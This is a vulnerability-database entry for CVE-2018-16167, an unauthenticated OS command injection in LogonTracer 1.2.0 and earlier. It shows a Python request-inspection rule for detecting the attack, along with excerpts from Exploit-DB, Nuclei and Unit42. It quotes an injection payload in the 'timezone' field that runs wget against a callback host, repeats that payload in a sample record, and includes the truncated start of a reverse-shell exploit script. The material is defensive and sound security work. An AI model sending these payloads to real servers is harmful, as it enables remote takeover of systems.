CVE-2018-16167
Published: 2019-01-09
LogonTracer 1.2.0 and earlier allows remote attackers to execute arbitrary OS commands via unspecified vectors.
Priority: P1 · 90 · critical · 9.8 (CVSS 3.0)
CVSS 3.0 vector: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Tags: exploited in the wild (ITW) · exploit available · VulnCheck KEV · initial access
EPSS: 74.74% (99.4th percentile)
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| jpcert | logontracer | <= 1.2.0 | — |
| jpcert_coordination_center | logontracer | — | — |
Detection & IOCs (extracted from sources)
Sigma / IOC pattern: `logtype=XML&timezone=1%3Bwget+http%3A%2F%2F{{interactsh-url}}%3B`
- The exploit targets the POST /upload endpoint with a crafted 'timezone' parameter containing a semicolon-delimited OS command injection payload (e.g., '1;<command>;'). Monitor for POST requests to /upload with semicolons in the timezone field.
- The injection is delivered via an application/x-www-form-urlencoded POST body to /upload. The timezone parameter value begins with '1;' followed by the injected command and a trailing semicolon.
- No authentication is required to exploit this vulnerability. Any unauthenticated POST to /upload with a malicious timezone value should be treated as an attack attempt.
- The vulnerable parameter is 'timezone' in the POST body to /upload. The injection delimiter is a semicolon (;), allowing arbitrary OS command chaining after the numeric value (e.g., '1;<cmd>;'). This applies to LogonTracer 1.2.0 and earlier.
- The logtype field is set to 'XML' in the exploit; this may be required for the vulnerable code path to be reached.
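The detection guidance above reduces to a simple request-inspection rule: a POST to /upload whose form-encoded `timezone` field is anything other than a numeric UTC offset is out of policy, and one containing shell metacharacters is an injection attempt. The following is an added example of that rule, not LogonTracer's own code and not taken from any of the sources quoted on this page. It assumes request records (method, path, content type, raw body) are available from a reverse proxy or WAF that logs full request bodies, and that a legitimate timezone value is a signed one- or two-digit offset with an optional fraction; both the record field names and that allowlist are assumptions made for the example.

```python
"""Request-inspection rule for command-injection attempts against
LogonTracer's POST /upload 'timezone' field (CVE-2018-16167).

Added example, not LogonTracer's own code. Assumptions: request records
come from a proxy/WAF that logs full bodies; a legitimate timezone value
is a numeric UTC offset such as "9" or "-5.5".
"""
import re
from urllib.parse import parse_qs

# Allowlist for a legitimate value (assumption: numeric UTC offset).
TIMEZONE_ALLOWED = re.compile(r"^[+-]?\d{1,2}(\.\d+)?$")
# Metacharacters that would let a value escape into an OS command line.
SHELL_META = re.compile(r"[;&|`$\n\r]")

RANK = {"allow": 0, "review": 1, "block": 2}


def classify_timezone(value):
    """Return (verdict, reason) for one decoded timezone value."""
    if TIMEZONE_ALLOWED.match(value):
        return ("allow", "numeric offset")
    if SHELL_META.search(value):
        return ("block", "shell metacharacter in timezone")
    return ("review", "non-numeric timezone")


def inspect_request(req):
    """Inspect one request record; only form POSTs to /upload are in scope."""
    if req["method"] != "POST" or req["path"].split("?")[0] != "/upload":
        return {"in_scope": False, "verdict": "allow", "reason": "not the upload endpoint"}
    ctype = req.get("content_type", "")
    if not ctype.startswith("application/x-www-form-urlencoded"):
        return {"in_scope": True, "verdict": "review", "reason": "unexpected content type"}
    # parse_qs percent-decodes and turns '+' into a space, so the rule sees
    # the value exactly as the application would.
    fields = parse_qs(req["body"], keep_blank_values=True)
    values = fields.get("timezone", [])
    if not values:
        return {"in_scope": True, "verdict": "allow", "reason": "no timezone field"}
    worst = ("allow", "numeric offset")
    for v in values:  # a repeated field is judged by its worst value
        verdict = classify_timezone(v)
        if RANK[verdict[0]] > RANK[worst[0]]:
            worst = verdict
    return {"in_scope": True, "verdict": worst[0], "reason": worst[1],
            "logtype": fields.get("logtype", [""])[0], "timezone": values}


# Constructed sample records (not real traffic). The second body follows the
# injection pattern quoted on this page, with the callback host replaced by
# a placeholder that cannot resolve.
SAMPLE_REQUESTS = [
    {"method": "POST", "path": "/upload",
     "content_type": "application/x-www-form-urlencoded",
     "body": "logtype=XML&timezone=9"},
    {"method": "POST", "path": "/upload",
     "content_type": "application/x-www-form-urlencoded",
     "body": "logtype=XML&timezone=1%3Bwget+http%3A%2F%2Fcallback.invalid%2F%3B"},
    {"method": "GET", "path": "/", "content_type": "", "body": ""},
]


def scan(requests=SAMPLE_REQUESTS):
    """Run the rule over a list of request records and return one result each."""
    return [inspect_request(r) for r in requests]


if __name__ == "__main__":
    for r, result in zip(SAMPLE_REQUESTS, scan()):
        print(r["method"], r["path"], "->", result["verdict"], "(" + result["reason"] + ")")
```

Classifying on the decoded value rather than the raw body matters: the quoted pattern is fully percent-encoded, so a rule that greps the raw body for a literal `;` misses it. The "review" verdict keeps non-numeric but metacharacter-free values visible without blocking them outright.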
CVSS provenance
| Source | CVSS version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | 3.0 | 9.8 | CRITICAL | CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
| nvd | 2.0 | 10.0 | CRITICAL | AV:N/AC:L/Au:N/C:C/I:C/A:C |
| vulncheck | — | 9.8 | CRITICAL | — |
GHSA
GHSA-6w9j-hq73-q3m2: LogonTracer 1
Source: ghsa_unreviewed · 2022-05-14 · CVE-2018-16167 · CRITICAL · CWE-78
LogonTracer 1.2.0 and earlier allows remote attackers to execute arbitrary OS commands via unspecified vectors.
VulnCheck
jpcert logontracer: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
Source: vulncheck · 2018 · CVSS 9.8 · CRITICAL
LogonTracer 1.2.0 and earlier allows remote attackers to execute arbitrary OS commands via unspecified vectors.
Affected: jpcert logontracer
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://veriti.ai/blog/vulnerable-villain-when-hackers-get-hacked/
Exploit PoC: https://vulncheck.com/xdb/8f05d52a8e5f
No detection rules found.
Exploit-DB
LogonTracer 1.2.0 - Remote Code Execution (Unauthenticated)
Source: exploitdb · 2021-06-01 · CVSS 9.8 · CRITICAL
---
```python
# Exploit Title: LogonTracer 1.2.0 - Remote Code Execution (Unauthenticated)
# Date: 29/05/2021
# Exploit Author: g0ldm45k
# Vendor Homepage: https://www.jpcert.or.jp/
# Software Link: https://github.com/JPCERTCC/LogonTracer/releases/tag/v1.2.0
# Version: 1.2.0 and earlier
# Tested on: Version 1.2.0 on Debian GNU/Linux 8 (jessie)
# CVE : CVE-2018-16167
import requests
import argparse
parser = argparse.ArgumentParser(description='Send a payload to a LogonTracer 1.2.0 (or earlier) server.')
parser.add_argument('aip', type=str, help='Attacker ip')
parser.add_argument('aport', type=str, help='Attacker port')
parser.add_argument('victimurl', type=str, help='Victim URL minus the path.')
args = parser.parse_args()
ATTACKER_IP =
```
Nuclei
LogonTracer <=1.2.0 - Remote Command Injection
Source: nuclei · CVSS 9.8 · CRITICAL
LogonTracer 1.2.0 and earlier allows remote attackers to execute arbitrary OS commands via unspecified vectors.
Template:
```yaml
id: CVE-2018-16167
info:
  name: LogonTracer <=1.2.0 - Remote Command Injection
  author: gy741
  severity: critical
  description: LogonTracer 1.2.0 and earlier allows remote attackers to execute arbitrary OS commands via unspecified vectors.
  impact: |
    Successful exploitation of this vulnerability allows remote attackers to execute arbitrary commands on the target system.
  remediation: |
    Upgrade LogonTracer to a version higher than 1.2.0.
  reference:
    - https://www.exploit-db.com/exploits/49918
    - https://nvd.nist.gov/vuln/detail/CVE-2018-16167
    - https://jvn.jp/en/vu/JVNVU98026636/index.html
    - https://github.com/JPCERTCC/LogonTrac
```
Unit42
Attackers Are Taking Advantage of the Open-Source Service Interactsh for Malicious Purposes
Source: blogs_unit42 · 2021-10-14
## Executive Summary
Recently, Unit 42 has observed active exploits related to an open-source service called Interactsh. This tool can generate specific domain names to help its users test whether an exploit is successful. It can be used by researchers – but also by attackers – to validate vulnerabilities via real-time monitoring on the trace path for the domain. Researchers creating a proof of concept (PoC) for an exploit can insert Interactsh to check whether the PoC is working, but the service could also be used by attackers who want to be sure an exploit is working.
This blog will first introduce the Interactsh tool and how researchers or attackers can leverage it to perform vulnerability validation. We then describe some of the many exploits in the wild leveraging this tool, and we
Authors: Yue Guan, Jin Chen, Leo Olson, Wayne Xin, Daiping Liu
Published: October 14, 2021
Tags: Cybercrime · Threat Research · Attack analysis · Exploit · Exploit in the wild · Interactsh